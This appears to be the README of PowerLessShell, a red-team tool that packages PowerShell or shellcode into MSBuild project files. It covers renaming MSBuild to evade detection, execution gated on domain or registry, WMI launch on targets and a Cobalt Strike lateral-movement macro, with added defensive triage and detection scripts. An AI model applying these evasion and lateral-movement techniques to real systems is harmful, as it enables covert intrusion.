PowerLessShell relies on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. Raw shellcode can be executed using the same approach.
To add another layer of crap, the payload copies msbuild.exe to a randomly named file and builds the payload using that randomly named binary.
- You can provide the -knownprocess switch to use a known Windows process name instead of renaming MsBuild.exe to something random.
MSBuild supports a Condition attribute that can be used to avoid running the code if the condition is not met:

```xml
<Target Name="x" Condition="'$(USERDOMAIN)'=='RingZer0'">
```

The malicious code will only be executed if the current user domain is "RingZer0".
Conditions support several other formats that can be used to create more conditional execution checks, for example a registry value comparison:

```xml
<Target Name="x" Condition="'$(registry:HKEY_LOCAL_MACHINE\blah@blah)'>='0'">
```
Property Functions also expose interesting data that can be used in the same way: https://docs.microsoft.com/en-us/visualstudio/msbuild/property-functions
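As an added defensive example (not code from the PowerLessShell project), the following Python script triages an MSBuild project file for the constructs described above: Condition attributes gated on the host's identity (the $(USERDOMAIN) form, the $(registry:...) form and a few similar property references) and UsingTask elements that compile inline code. The sample project text is constructed here and its task body is a placeholder comment; the gate list and the finding wording are this example's own choices.

```python
import re
import sys
import xml.etree.ElementTree as ET

# Constructed sample (not from the project): the skeleton of a generated
# project file, with the inline task body replaced by a placeholder comment.
SAMPLE_PROJECT = r"""<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="x" Condition="'$(USERDOMAIN)'=='RingZer0'">
    <y />
  </Target>
  <Target Name="z" Condition="'$(registry:HKEY_LOCAL_MACHINE\blah@blah)'>='0'" />
  <UsingTask TaskName="y" TaskFactory="CodeTaskFactory"
             AssemblyFile="$(MSBuildToolsPath)\Microsoft.Build.Tasks.v4.0.dll">
    <Task>
      <Code Type="Class" Language="cs"><![CDATA[ /* placeholder */ ]]></Code>
    </Task>
  </UsingTask>
</Project>
"""

# Property references that gate execution on the host's identity or state:
# the $(USERDOMAIN) and $(registry:...) forms plus a few siblings of the same
# kind (this list is an assumption of the example, extend it as needed).
GATE_REF = re.compile(
    r"\$\((USERDOMAIN|USERNAME|COMPUTERNAME|USERDNSDOMAIN|registry:[^)]*)\)", re.I
)


def _local(tag: str) -> str:
    """Strip the MSBuild XML namespace from an element tag."""
    return tag.rsplit("}", 1)[-1]


def triage_project(xml_text: str) -> list:
    """Return human-readable findings for one MSBuild project document."""
    findings = []
    root = ET.fromstring(xml_text)
    for el in root.iter():
        tag = _local(el.tag)
        cond = el.get("Condition")
        if cond:
            # Any element may carry a Condition; report each gating reference.
            for m in GATE_REF.finditer(cond):
                label = el.get("Name", el.get("TaskName", ""))
                findings.append(f"{tag} {label!r} gated on $({m.group(1)})")
        if tag == "UsingTask":
            # Inline tasks mean the project file itself carries compiled code.
            factory = el.get("TaskFactory", "")
            code = [c for c in el.iter() if _local(c.tag) == "Code"]
            if code or "CodeTaskFactory" in factory:
                lang = code[0].get("Language") if code else None
                findings.append(
                    f"UsingTask {el.get('TaskName')!r} compiles inline code "
                    f"(TaskFactory={factory!r}, Language={lang!r})"
                )
    return findings


if __name__ == "__main__":
    # Usage: python triage_msbuild.py [project.csproj]; defaults to the sample.
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8") as fh:
            text = fh.read()
    else:
        text = SAMPLE_PROJECT
    findings = triage_project(text)
    for line in findings:
        print("[!]", line)
    if not findings:
        print("[-] no suspicious constructs found")
```

The namespace is stripped from every tag so the same logic works for project files with or without the MSBuild xmlns; a project that only contains ordinary targets produces no findings.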
### Raw shellcode

```
$ python PowerLessShell.py
PowerLessShell - Remain Stealth
More PowerShell Less Powershell.exe - Mr.Un1k0d3r RingZer0 Team
                  ___
              .-"; ! ;"-.
             .'! : | : !`.
            /\ ! : ! : ! /\
           /\ | ! :|: ! | /\
          ( \ \ ; :!: ; / / )
        ( `. \ | !:|:! | / .' )
        (`. \ \ \!:|:!/ / / .')
         \ `.`.\ |!|! |/,'.' /
          `._`.\\!!!// .'_.'
             `.`.\|//.'.'
              |`._`n'_.'|
              `----^----"
(Set payload type 'powershell, shellcode')>>> shellcode
(Path to the raw shellcode file)>>> shellcode.raw
(Path for the generated MsBuild out file)>>> payload.csproj
(Set USERDOMAIN condition (Default ''))>>> RingZer0
(Use known process name to perform MsBuild renaming (Default: False))>>>
[+] payload.csproj was generated.
[+] payload.csproj.cmd was generated.
[+] Run the command inside of payload.csproj.cmd on the target system using WMI.
```
### PowerShell

```
$ python PowerLessShell.py
PowerLessShell - Remain Stealth
More PowerShell Less Powershell.exe - Mr.Un1k0d3r RingZer0 Team
                  ___
              .-"; ! ;"-.
             .'! : | : !`.
            /\ ! : ! : ! /\
           /\ | ! :|: ! | /\
          ( \ \ ; :!: ; / / )
        ( `. \ | !:|:! | / .' )
        (`. \ \ \!:|:!/ / / .')
         \ `.`.\ |!|! |/,'.' /
          `._`.\\!!!// .'_.'
             `.`.\|//.'.'
              |`._`n'_.'|
              `----^----"
(Set payload type 'powershell, shellcode')>>> powershell
(Path to the PowerShell script)>>> payload.ps1
(Path for the generated MsBuild out file)>>> payload.csproj
(Set USERDOMAIN condition (Default ''))>>>
(Use known process name to perform MsBuild renaming (Default: False))>>>
[+] payload.csproj was generated.
[+] payload.csproj.cmd was generated.
[+] Run the command inside of payload.csproj.cmd on the target system using WMI.
```
### Inline command

```
$ python PowerLessShell.py powershell.ps1 output (optional shellcode, -knownprocess)
PowerLessShell - Remain Stealth
More PowerShell Less Powershell.exe - Mr.Un1k0d3r RingZer0 Team
                  ___
              .-"; ! ;"-.
             .'! : | : !`.
            /\ ! : ! : ! /\
           /\ | ! :|: ! | /\
          ( \ \ ; :!: ; / / )
        ( `. \ | !:|:! | / .' )
        (`. \ \ \!:|:!/ / / .')
         \ `.`.\ |!|! |/,'.' /
          `._`.\\!!!// .'_.'
             `.`.\|//.'.'
              |`._`n'_.'|
              `----^----"
[+] output was generated.
[+] output.cmd was generated.
[+] Run the command inside of output.cmd on the target system using WMI.
```
The following example runs the RC4 RAT (https://github.com/Mr-Un1k0d3r/RC4-PowerShell-RAT) without running a single instance of PowerShell.

cd into your Cobalt Strike client directory:

```
cd /root/cobaltstrike
```

Clone this repository into the folder PowerLessShell:

```
git clone https://github.com/Mr-Un1k0d3r/PowerLessShell.git
```

Load the aggressor script in your Cobalt Strike console. Lateral movement then works just like the other Cobalt Strike macros:

```
wmi_msbuild [target] [listener]
```
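The artifacts this workflow leaves on a host are consistent: an MSBuild binary running under another file name (random or a known process name), an MSBuild image outside its install directory, a parent of WmiPrvSE.exe when the .cmd is launched over WMI, and a project file in a user-writable location. As an added detection example (not part of the PowerLessShell project or the aggressor script), the Python below scores constructed process-creation records carrying Sysmon-style fields (Image, OriginalFileName, ParentImage, CommandLine) against those four indicators. The directory lists and the sample events are this example's assumptions, not values from the page.

```python
import ntpath
import re

# Constructed process-creation records with Sysmon Event ID 1 style fields;
# none of these come from a real host.
SAMPLE_EVENTS = [
    {   # legitimate build started from Visual Studio
        "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
        "OriginalFileName": "MSBuild.exe",
        "ParentImage": r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
        "CommandLine": r"MSBuild.exe C:\src\app\app.csproj",
    },
    {   # copy of MSBuild under a known process name, started over WMI
        "Image": r"C:\Users\Public\svchost.exe",
        "OriginalFileName": "MSBuild.exe",
        "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
        "CommandLine": r"svchost.exe C:\Users\Public\payload.csproj",
    },
    {   # copy of MSBuild under a random name
        "Image": r"C:\Windows\Temp\aB3xQ9.exe",
        "OriginalFileName": "MSBuild.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"aB3xQ9.exe C:\Windows\Temp\aB3xQ9.csproj",
    },
    {   # unrenamed MSBuild, but a WMI parent and a project under ProgramData
        "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
        "OriginalFileName": "MSBuild.exe",
        "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
        "CommandLine": r"MSBuild.exe C:\ProgramData\payload.csproj",
    },
    {   # the real svchost.exe: not MSBuild at all, must be ignored
        "Image": r"C:\Windows\System32\svchost.exe",
        "OriginalFileName": "svchost.exe",
        "ParentImage": r"C:\Windows\System32\services.exe",
        "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs",
    },
]

# Where an MSBuild.exe is expected to live (lower-cased path substrings);
# assumption of this example, tune to the build tooling in your environment.
EXPECTED_DIRS = ("\\microsoft.net\\framework", "\\microsoft visual studio\\", "\\dotnet\\")
# Locations a non-admin user can usually write to.
WRITABLE_DIRS = ("\\users\\", "\\temp\\", "\\programdata\\", "\\appdata\\")
# First unquoted project-file argument on the command line.
PROJECT_ARG = re.compile(r"(\S+\.(?:csproj|vbproj|proj|xml))", re.I)


def is_msbuild(ev: dict) -> bool:
    """True if the binary is MSBuild, whatever it has been renamed to."""
    return (ev.get("OriginalFileName", "").lower() == "msbuild.exe"
            or ntpath.basename(ev.get("Image", "")).lower() == "msbuild.exe")


def score_event(ev: dict) -> list:
    """Return the reasons this process-creation event looks suspicious."""
    reasons = []
    if not is_msbuild(ev):
        return reasons
    image = ev.get("Image", "")
    name = ntpath.basename(image).lower()
    if ev.get("OriginalFileName", "").lower() == "msbuild.exe" and name != "msbuild.exe":
        reasons.append(f"MSBuild running under another file name: {name}")
    if not any(d in image.lower() for d in EXPECTED_DIRS):
        reasons.append(f"MSBuild image outside a build-tool install directory: {image}")
    if ntpath.basename(ev.get("ParentImage", "")).lower() == "wmiprvse.exe":
        reasons.append("parent is WmiPrvSE.exe (process created through WMI)")
    m = PROJECT_ARG.search(ev.get("CommandLine", ""))
    if m and any(d in m.group(1).lower() for d in WRITABLE_DIRS):
        reasons.append(f"project file in a user-writable location: {m.group(1)}")
    return reasons


def triage(events: list) -> dict:
    """Map event index -> reasons, for events with at least one reason."""
    hits = {}
    for i, ev in enumerate(events):
        reasons = score_event(ev)
        if reasons:
            hits[i] = reasons
    return hits


if __name__ == "__main__":
    for i, reasons in triage(SAMPLE_EVENTS).items():
        print(f"event {i}: " + "; ".join(reasons))
```

The OriginalFileName check is what survives the renaming step: the PE version resource still says MSBuild.exe whether the copy is called something random or svchost.exe, and it is the comparison against the on-disk name that fires. The legitimate build in event 0 produces no reasons, and the genuine svchost.exe in event 4 is skipped before any check runs.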
Mr.Un1k0d3r RingZer0 Team 2017